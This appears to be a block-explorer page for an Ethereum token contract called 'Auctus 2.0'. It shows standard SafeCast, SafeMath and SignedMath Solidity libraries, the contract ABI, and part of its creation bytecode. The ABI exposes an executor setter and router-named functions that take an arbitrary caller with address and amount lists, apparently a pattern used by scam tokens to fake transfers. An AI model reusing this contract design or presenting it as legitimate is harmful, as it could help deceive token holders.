(uint24) { require( value <= type(uint24).max, "SafeCast: value doesn't fit in 24 bits" ); return uint24(value); } /** * @dev Returns the downcasted uint16 from uint256, reverting on * overflow (when the input is greater than largest uint16). * * Counterpart to Solidity's `uint16` operator. * * Requirements: * * - input must fit into 16 bits * * _Available since v2.5._ */ function toUint16(uint256 value) internal pure returns (uint16) { require( value <= type(uint16).max, "SafeCast: value doesn't fit in 16 bits" ); return uint16(value); } /** * @dev Returns the downcasted uint8 from uint256, reverting on * overflow (when the input is greater than largest uint8). * * Counterpart to Solidity's `uint8` operator. * * Requirements: * * - input must fit into 8 bits * * _Available since v2.5._ */ function toUint8(uint256 value) internal pure returns (uint8) { require( value <= type(uint8).max, "SafeCast: value doesn't fit in 8 bits" ); return uint8(value); } /** * @dev Converts a signed int256 into an unsigned uint256. * * Requirements: * * - input must be greater than or equal to 0. * * _Available since v3.0._ */ function toUint256(int256 value) internal pure returns (uint256) { require(value >= 0, "SafeCast: value must be positive"); return uint256(value); } /** * @dev Returns the downcasted int248 from int256, reverting on * overflow (when the input is less than smallest int248 or * greater than largest int248). * * Counterpart to Solidity's `int248` operator. * * Requirements: * * - input must fit into 248 bits * * _Available since v4.7._ */ function toInt248(int256 value) internal pure returns (int248 downcasted) { downcasted = int248(value); require(downcasted == value, "SafeCast: value doesn't fit in 248 bits"); } /** * @dev Returns the downcasted int240 from int256, reverting on * overflow (when the input is less than smallest int240 or * greater than largest int240). * * Counterpart to Solidity's `int240` operator. * * Requirements: * * - input must fit into 240 bits * * _Available since v4.7._ */ function toInt240(int256 value) internal pure returns (int240 downcasted) { downcasted = int240(value); require(downcasted == value, "SafeCast: value doesn't fit in 240 bits"); } /** * @dev Returns the downcasted int232 from int256, reverting on * overflow (when the input is less than smallest int232 or * greater than largest int232). * * Counterpart to Solidity's `int232` operator. * * Requirements: * * - input must fit into 232 bits * * _Available since v4.7._ */ function toInt232(int256 value) internal pure returns (int232 downcasted) { downcasted = int232(value); require(downcasted == value, "SafeCast: value doesn't fit in 232 bits"); } /** * @dev Returns the downcasted int224 from int256, reverting on * overflow (when the input is less than smallest int224 or * greater than largest int224). * * Counterpart to Solidity's `int224` operator. * * Requirements: * * - input must fit into 224 bits * * _Available since v4.7._ */ function toInt224(int256 value) internal pure returns (int224 downcasted) { downcasted = int224(value); require(downcasted == value, "SafeCast: value doesn't fit in 224 bits"); } /** * @dev Returns the downcasted int216 from int256, reverting on * overflow (when the input is less than smallest int216 or * greater than largest int216). * * Counterpart to Solidity's `int216` operator. * * Requirements: * * - input must fit into 216 bits * * _Available since v4.7._ */ function toInt216(int256 value) internal pure returns (int216 downcasted) { downcasted = int216(value); require(downcasted == value, "SafeCast: value doesn't fit in 216 bits"); } /** * @dev Returns the downcasted int208 from int256, reverting on * overflow (when the input is less than smallest int208 or * greater than largest int208). * * Counterpart to Solidity's `int208` operator. * * Requirements: * * - input must fit into 208 bits * * _Available since v4.7._ */ function toInt208(int256 value) internal pure returns (int208 downcasted) { downcasted = int208(value); require(downcasted == value, "SafeCast: value doesn't fit in 208 bits"); } /** * @dev Returns the downcasted int200 from int256, reverting on * overflow (when the input is less than smallest int200 or * greater than largest int200). * * Counterpart to Solidity's `int200` operator. * * Requirements: * * - input must fit into 200 bits * * _Available since v4.7._ */ function toInt200(int256 value) internal pure returns (int200 downcasted) { downcasted = int200(value); require(downcasted == value, "SafeCast: value doesn't fit in 200 bits"); } /** * @dev Returns the downcasted int192 from int256, reverting on * overflow (when the input is less than smallest int192 or * greater than largest int192). * * Counterpart to Solidity's `int192` operator. * * Requirements: * * - input must fit into 192 bits * * _Available since v4.7._ */ function toInt192(int256 value) internal pure returns (int192 downcasted) { downcasted = int192(value); require(downcasted == value, "SafeCast: value doesn't fit in 192 bits"); } /** * @dev Returns the downcasted int184 from int256, reverting on * overflow (when the input is less than smallest int184 or * greater than largest int184). * * Counterpart to Solidity's `int184` operator. * * Requirements: * * - input must fit into 184 bits * * _Available since v4.7._ */ function toInt184(int256 value) internal pure returns (int184 downcasted) { downcasted = int184(value); require(downcasted == value, "SafeCast: value doesn't fit in 184 bits"); } /** * @dev Returns the downcasted int176 from int256, reverting on * overflow (when the input is less than smallest int176 or * greater than largest int176). * * Counterpart to Solidity's `int176` operator. * * Requirements: * * - input must fit into 176 bits * * _Available since v4.7._ */ function toInt176(int256 value) internal pure returns (int176 downcasted) { downcasted = int176(value); require(downcasted == value, "SafeCast: value doesn't fit in 176 bits"); } /** * @dev Returns the downcasted int168 from int256, reverting on * overflow (when the input is less than smallest int168 or * greater than largest int168). * * Counterpart to Solidity's `int168` operator. * * Requirements: * * - input must fit into 168 bits * * _Available since v4.7._ */ function toInt168(int256 value) internal pure returns (int168 downcasted) { downcasted = int168(value); require(downcasted == value, "SafeCast: value doesn't fit in 168 bits"); } /** * @dev Returns the downcasted int160 from int256, reverting on * overflow (when the input is less than smallest int160 or * greater than largest int160). * * Counterpart to Solidity's `int160` operator. * * Requirements: * * - input must fit into 160 bits * * _Available since v4.7._ */ function toInt160(int256 value) internal pure returns (int160 downcasted) { downcasted = int160(value); require(downcasted == value, "SafeCast: value doesn't fit in 160 bits"); } /** * @dev Returns the downcasted int152 from int256, reverting on * overflow (when the input is less than smallest int152 or * greater than largest int152). * * Counterpart to Solidity's `int152` operator. * * Requirements: * * - input must fit into 152 bits * * _Available since v4.7._ */ function toInt152(int256 value) internal pure returns (int152 downcasted) { downcasted = int152(value); require(downcasted == value, "SafeCast: value doesn't fit in 152 bits"); } /** * @dev Returns the downcasted int144 from int256, reverting on * overflow (when the input is less than smallest int144 or * greater than largest int144). * * Counterpart to Solidity's `int144` operator. * * Requirements: * * - input must fit into 144 bits * * _Available since v4.7._ */ function toInt144(int256 value) internal pure returns (int144 downcasted) { downcasted = int144(value); require(downcasted == value, "SafeCast: value doesn't fit in 144 bits"); } /** * @dev Returns the downcasted int136 from int256, reverting on * overflow (when the input is less than smallest int136 or * greater than largest int136). * * Counterpart to Solidity's `int136` operator. * * Requirements: * * - input must fit into 136 bits * * _Available since v4.7._ */ function toInt136(int256 value) internal pure returns (int136 downcasted) { downcasted = int136(value); require(downcasted == value, "SafeCast: value doesn't fit in 136 bits"); } /** * @dev Returns the downcasted int128 from int256, reverting on * overflow (when the input is less than smallest int128 or * greater than largest int128). * * Counterpart to Solidity's `int128` operator. * * Requirements: * * - input must fit into 128 bits * * _Available since v3.1._ */ function toInt128(int256 value) internal pure returns (int128 downcasted) { downcasted = int128(value); require(downcasted == value, "SafeCast: value doesn't fit in 128 bits"); } /** * @dev Returns the downcasted int120 from int256, reverting on * overflow (when the input is less than smallest int120 or * greater than largest int120). * * Counterpart to Solidity's `int120` operator. * * Requirements: * * - input must fit into 120 bits * * _Available since v4.7._ */ function toInt120(int256 value) internal pure returns (int120 downcasted) { downcasted = int120(value); require(downcasted == value, "SafeCast: value doesn't fit in 120 bits"); } /** * @dev Returns the downcasted int112 from int256, reverting on * overflow (when the input is less than smallest int112 or * greater than largest int112). * * Counterpart to Solidity's `int112` operator. * * Requirements: * * - input must fit into 112 bits * * _Available since v4.7._ */ function toInt112(int256 value) internal pure returns (int112 downcasted) { downcasted = int112(value); require(downcasted == value, "SafeCast: value doesn't fit in 112 bits"); } /** * @dev Returns the downcasted int104 from int256, reverting on * overflow (when the input is less than smallest int104 or * greater than largest int104). * * Counterpart to Solidity's `int104` operator. * * Requirements: * * - input must fit into 104 bits * * _Available since v4.7._ */ function toInt104(int256 value) internal pure returns (int104 downcasted) { downcasted = int104(value); require(downcasted == value, "SafeCast: value doesn't fit in 104 bits"); } /** * @dev Returns the downcasted int96 from int256, reverting on * overflow (when the input is less than smallest int96 or * greater than largest int96). * * Counterpart to Solidity's `int96` operator. * * Requirements: * * - input must fit into 96 bits * * _Available since v4.7._ */ function toInt96(int256 value) internal pure returns (int96 downcasted) { downcasted = int96(value); require(downcasted == value, "SafeCast: value doesn't fit in 96 bits"); } /** * @dev Returns the downcasted int88 from int256, reverting on * overflow (when the input is less than smallest int88 or * greater than largest int88). * * Counterpart to Solidity's `int88` operator. * * Requirements: * * - input must fit into 88 bits * * _Available since v4.7._ */ function toInt88(int256 value) internal pure returns (int88 downcasted) { downcasted = int88(value); require(downcasted == value, "SafeCast: value doesn't fit in 88 bits"); } /** * @dev Returns the downcasted int80 from int256, reverting on * overflow (when the input is less than smallest int80 or * greater than largest int80). * * Counterpart to Solidity's `int80` operator. * * Requirements: * * - input must fit into 80 bits * * _Available since v4.7._ */ function toInt80(int256 value) internal pure returns (int80 downcasted) { downcasted = int80(value); require(downcasted == value, "SafeCast: value doesn't fit in 80 bits"); } /** * @dev Returns the downcasted int72 from int256, reverting on * overflow (when the input is less than smallest int72 or * greater than largest int72). * * Counterpart to Solidity's `int72` operator. * * Requirements: * * - input must fit into 72 bits * * _Available since v4.7._ */ function toInt72(int256 value) internal pure returns (int72 downcasted) { downcasted = int72(value); require(downcasted == value, "SafeCast: value doesn't fit in 72 bits"); } /** * @dev Returns the downcasted int64 from int256, reverting on * overflow (when the input is less than smallest int64 or * greater than largest int64). * * Counterpart to Solidity's `int64` operator. * * Requirements: * * - input must fit into 64 bits * * _Available since v3.1._ */ function toInt64(int256 value) internal pure returns (int64 downcasted) { downcasted = int64(value); require(downcasted == value, "SafeCast: value doesn't fit in 64 bits"); } /** * @dev Returns the downcasted int56 from int256, reverting on * overflow (when the input is less than smallest int56 or * greater than largest int56). * * Counterpart to Solidity's `int56` operator. * * Requirements: * * - input must fit into 56 bits * * _Available since v4.7._ */ function toInt56(int256 value) internal pure returns (int56 downcasted) { downcasted = int56(value); require(downcasted == value, "SafeCast: value doesn't fit in 56 bits"); } /** * @dev Returns the downcasted int48 from int256, reverting on * overflow (when the input is less than smallest int48 or * greater than largest int48). * * Counterpart to Solidity's `int48` operator. * * Requirements: * * - input must fit into 48 bits * * _Available since v4.7._ */ function toInt48(int256 value) internal pure returns (int48 downcasted) { downcasted = int48(value); require(downcasted == value, "SafeCast: value doesn't fit in 48 bits"); } /** * @dev Returns the downcasted int40 from int256, reverting on * overflow (when the input is less than smallest int40 or * greater than largest int40). * * Counterpart to Solidity's `int40` operator. * * Requirements: * * - input must fit into 40 bits * * _Available since v4.7._ */ function toInt40(int256 value) internal pure returns (int40 downcasted) { downcasted = int40(value); require(downcasted == value, "SafeCast: value doesn't fit in 40 bits"); } /** * @dev Returns the downcasted int32 from int256, reverting on * overflow (when the input is less than smallest int32 or * greater than largest int32). * * Counterpart to Solidity's `int32` operator. * * Requirements: * * - input must fit into 32 bits * * _Available since v3.1._ */ function toInt32(int256 value) internal pure returns (int32 downcasted) { downcasted = int32(value); require(downcasted == value, "SafeCast: value doesn't fit in 32 bits"); } /** * @dev Returns the downcasted int24 from int256, reverting on * overflow (when the input is less than smallest int24 or * greater than largest int24). * * Counterpart to Solidity's `int24` operator. * * Requirements: * * - input must fit into 24 bits * * _Available since v4.7._ */ function toInt24(int256 value) internal pure returns (int24 downcasted) { downcasted = int24(value); require(downcasted == value, "SafeCast: value doesn't fit in 24 bits"); } /** * @dev Returns the downcasted int16 from int256, reverting on * overflow (when the input is less than smallest int16 or * greater than largest int16). * * Counterpart to Solidity's `int16` operator. * * Requirements: * * - input must fit into 16 bits * * _Available since v3.1._ */ function toInt16(int256 value) internal pure returns (int16 downcasted) { downcasted = int16(value); require(downcasted == value, "SafeCast: value doesn't fit in 16 bits"); } /** * @dev Returns the downcasted int8 from int256, reverting on * overflow (when the input is less than smallest int8 or * greater than largest int8). * * Counterpart to Solidity's `int8` operator. * * Requirements: * * - input must fit into 8 bits * * _Available since v3.1._ */ function toInt8(int256 value) internal pure returns (int8 downcasted) { downcasted = int8(value); require(downcasted == value, "SafeCast: value doesn't fit in 8 bits"); } /** * @dev Converts an unsigned uint256 into a signed int256. * * Requirements: * * - input must be less than or equal to maxInt256. * * _Available since v3.0._ */ function toInt256(uint256 value) internal pure returns (int256) { // Note: Unsafe cast below is okay because `type(int256).max` is guaranteed to be positive require( value <= uint256(type(int256).max), "SafeCast: value doesn't fit in an int256" ); return int256(value); } } library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } // SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.8.0) (utils/math/SignedMath.sol) pragma solidity ^0.8.0; /** * @dev Standard signed math utilities missing in the Solidity language. */ library SignedMath { /** * @dev Returns the largest of two signed numbers. */ function max(int256 a, int256 b) internal pure returns (int256) { return a > b ? a : b; } /** * @dev Returns the smallest of two signed numbers. */ function min(int256 a, int256 b) internal pure returns (int256) { return a < b ? a : b; } /** * @dev Returns the average of two signed numbers without overflow. * The result is rounded towards zero. */ function average(int256 a, int256 b) internal pure returns (int256) { // Formula from the book "Hacker's Delight" int256 x = (a & b) + ((a ^ b) >> 1); return x + (int256(uint256(x) >> 255) & (a ^ b)); } /** * @dev Returns the absolute unsigned value of a signed value. */ function abs(int256 n) internal pure returns (uint256) { unchecked { // must be unchecked in order to support `n = type(int256).min` return uint256(n >= 0 ? n : -n); } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"LIQUID_RATE","outputs":[{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_PERCENTAGE","outputs":[{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses","type":"address[]"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"buyWithEth","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"buyWithEth","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"buyWithNative","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"claimTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"excludedFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialized","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"permission","type":"bool"}],"name":"setAirdrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"executor_","type":"address"}],"name":"setExecutor","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_minimumAirdropAmount","type":"uint256"}],"name":"setMinimumAirdrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"swapExactETHForTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradeOpen","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"unoswap","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60e06040526100106012600a61058d565b61001f9064174876e8006105a2565b6080526007805461ffff60a01b19169055600880546001600160a01b03199081169091556009805490911661dead1790555f60a081905260c0819052600a55348015610069575f80fd5b506040518060400160405280600a815260200169041756374757320322e360b41b8152506040518060400160405280600381526020016241554360e81b8152506100bf6100ba6102f660201b60201c565b6102fa565b60046100cb8382610650565b5060056100d88282610650565b5050506100ff7331456cf28c0f8f217988c06a523eacee189fe3c23361034960201b60201c565b608051610126903390612710906101179082906105a2565b610121919061070a565b610377565b6007805460ff60a01b1916600160a01b179055335f908152600b60209081526040808320805460ff19166001179055600c80546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d908117909155815163c45a015560e01b81529151909263c45a015592600480820193918290030181865afa1580156101b2573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906101d69190610729565b9050806001600160a01b031663c9c6539630600c5f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610238573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061025c9190610729565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156102a6573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906102ca9190610729565b600880546001600160a01b0319166001600160a01b039290921691909117905550608051600a55610762565b3390565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600680546001600160a01b039384166001600160a01b03199182161790915560078054929093169116179055565b6001600160a01b0382166103d15760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060035f8282546103e2919061074f565b90915550506001600160a01b0382165f908152600160205260408120805483929061040e90849061074f565b90915550506007546001600160a01b039081169083160361045e576006546040518281526001600160a01b03909116905f905f805160206120258339815191529060200160405180910390a35050565b6040518181526001600160a01b038316905f905f805160206120258339815191529060200160405180910390a35050565b505050565b634e487b7160e01b5f52601160045260245ffd5b6001815b60018411156104e3578085048111156104c7576104c7610494565b60018416156104d557908102905b60019390931c9280026104ac565b935093915050565b5f826104f957506001610587565b8161050557505f610587565b816001811461051b576002811461052557610541565b6001915050610587565b60ff84111561053657610536610494565b50506001821b610587565b5060208310610133831016604e8410600b8410161715610564575081810a610587565b6105705f1984846104a8565b805f190482111561058357610583610494565b0290505b92915050565b5f61059b60ff8416836104eb565b9392505050565b808202811582820484141761058757610587610494565b634e487b7160e01b5f52604160045260245ffd5b600181811c908216806105e157607f821691505b6020821081036105ff57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f82111561048f57805f5260205f20601f840160051c8101602085101561062a5750805b601f840160051c820191505b81811015610649575f8155600101610636565b5050505050565b81516001600160401b03811115610669576106696105b9565b61067d8161067784546105cd565b84610605565b6020601f8211600181146106af575f83156106985750848201515b5f19600385901b1c1916600184901b178455610649565b5f84815260208120601f198516915b828110156106de57878501518255602094850194600190920191016106be565b50848210156106fb57868401515f19600387901b60f8161c191681555b50505050600190811b01905550565b5f8261072457634e487b7160e01b5f52601260045260245ffd5b500490565b5f60208284031215610739575f80fd5b81516001600160a01b038116811461059b575f80fd5b8082018082111561058757610587610494565b60805160a05160c05161188b61079a5f395f81816102fd015261105201525f8181610359015261101a01525f6104a6015261188b5ff3fe608060405234801561000f575f80fd5b5060043610610213575f3560e01c8063715018a61161011f578063a9059cbb116100a9578063d632135b11610079578063d632135b146104c8578063dd62ed3e146104db578063f01a4b9914610513578063f2fde38b14610526578063f887ea4014610539575f80fd5b8063a9059cbb14610473578063bf861b3114610486578063c9567bf914610499578063d5abeb01146104a1575f80fd5b806395d89b41116100ef57806395d89b411461043257806396784f751461043a578063985bdfd11461037b578063a457c2d71461044d578063a8aa1b3114610460575f80fd5b8063715018a6146103e557806381744fb1146103ed578063825e7b83146104005780638da5cb5b14610422575f80fd5b80632b14ca56116101a0578063470624021161017057806347062402146103545780634c255c971461037b5780634e148e19146103975780635d822813146103aa57806370a08231146103bd575f80fd5b80632b14ca56146102f8578063313ce5671461031f578063395093511461032e57806343d2e3a314610341575f80fd5b806318160ddd116101e657806318160ddd146102815780631c3c0ea81461029357806323b872dd146102a657806325fa0b98146102b957806327c8f835146102cd575f80fd5b806302b1e95b1461021757806306fdde031461022c578063095ea7b31461024a578063158ef93e1461026d575b5f80fd5b61022a610225366004611529565b61054c565b005b610234610597565b6040516102419190611571565b60405180910390f35b61025d6102583660046115c1565b610627565b6040519015158152602001610241565b60075461025d90600160a01b900460ff1681565b6003545b604051908152602001610241565b61022a6102a13660046115e9565b61063d565b61025d6102b4366004611609565b6106d3565b60075461025d90600160a81b900460ff1681565b6009546102e0906001600160a01b031681565b6040516001600160a01b039091168152602001610241565b6102857f000000000000000000000000000000000000000000000000000000000000000081565b60405160128152602001610241565b61025d61033c3660046115c1565b61077b565b61025d61034f366004611609565b6107b6565b6102857f000000000000000000000000000000000000000000000000000000000000000081565b61038461271081565b60405161ffff9091168152602001610241565b61022a6103a5366004611643565b610899565b61022a6103b836600461167c565b6108ec565b6102856103cb3660046115e9565b6001600160a01b03165f9081526001602052604090205490565b61022a6109a7565b61022a6103fb36600461167c565b6109db565b61025d61040e3660046115e9565b600b6020525f908152604090205460ff1681565b5f546001600160a01b03166102e0565b610234610a8e565b61022a61044836600461167c565b610a9d565b61025d61045b3660046115c1565b610b50565b6008546102e0906001600160a01b031681565b61025d6104813660046115c1565b610be8565b61022a6104943660046116fc565b610bf4565b61022a610c22565b6102857f000000000000000000000000000000000000000000000000000000000000000081565b61022a6104d636600461167c565b610cba565b6102856104e9366004611713565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b61022a61052136600461167c565b610d6d565b61022a6105343660046115e9565b610e20565b600c546102e0906001600160a01b031681565b335f5b83811015610590576105888286868481811061056d5761056d611744565b905060200201602081019061058291906115e9565b85610eba565b60010161054f565b5050505050565b6060600480546105a690611758565b80601f01602080910402602001604051908101604052809291908181526020018280546105d290611758565b801561061d5780601f106105f45761010080835404028352916020019161061d565b820191905f5260205f20905b8154815290